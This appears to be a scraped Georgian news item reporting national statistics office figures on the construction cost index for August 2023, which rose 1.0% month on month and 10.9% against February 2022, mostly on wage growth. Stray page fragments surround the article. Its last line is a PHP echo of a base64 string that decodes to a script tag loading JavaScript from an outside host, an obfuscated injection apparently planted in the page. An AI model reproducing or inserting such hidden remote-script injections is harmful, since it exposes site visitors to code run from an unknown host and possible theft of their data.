celsiusi
ავერსი საქკაბელი

 სტატისტიკის ეროვნული სამსახურის ინფორმაციით, 2023 წლის აგვისტოში მშენებლობის ღირებულების ინდექსი წინა თვესთან შედარებით 1.0 პროცენტით გაიზარდა.

საქსტატის ცნობით, აღნიშნული ცვლილება ძირითადად, განპირობებული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 1.6 პროცენტიანი ზრდით, რამაც 0.6 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში.

უწყების ანგარიშის მიხედვით, 2022 წლის თებერვალთან შედარებით მშენებლობის ღირებულების ინდექსი გაიზარდა 10.9 პროცენტით. ინდექსის ზრდა, უმეტესწილად, გამოწვეული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 28.1 პროცენტიანი ზრდით და სამშენებლო მასალების 6.2 პროცენტიანი გაძვირებით, რამაც, შესაბამისად, 6.45 და 3.46 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში.

297
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");